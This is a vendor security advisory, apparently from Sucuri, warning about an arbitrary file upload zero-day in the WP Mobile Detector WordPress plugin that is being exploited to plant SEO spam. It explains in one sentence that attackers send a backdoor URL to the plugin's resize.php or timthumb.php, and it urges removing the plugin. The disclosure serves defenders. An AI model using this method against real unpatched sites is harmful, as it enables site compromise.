[Security Disclosure] WP Mobile Detector Vulnerability Being Exploited in the Wild
WP Mobile Detector Vulnerability Being Exploited in the Wild
We are reaching out to you today because we have noticed an increase in the number of websites infected with SEO Spam, and the attack vector is the WP Mobile Detector plugin. The plugin has a new Zero Day vulnerability allowing attacker to exploit a Arbitrary File Upload (AFU) vulnerability. The plugin has been removed from the WordPress repository and does not have an active patch available.
The zero day was disclosed May 31st, and we were able to track live attacks going back to May 27th. All customers using the Sucuri Firewall have been protected since May 27th. We have actively tested the most popular application level security plugins for WordPress and the exploits are evading their prevention controls.
The plugin has since been removed from the WordPress repository and no patches are available.
The vulnerability is very easy to exploit. All the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb, in this case it just includes resize.php), inside the plugin directory with the backdoor URL.
It's imperative that if you are using this plugin you remove it from your enviornment and find a suitable replacement.
Being proactive in the protection of your site is of one of the most important aspects of having a solid security posture. Therefore, we feel it's important to research and report on all potential threats as quickly as possible.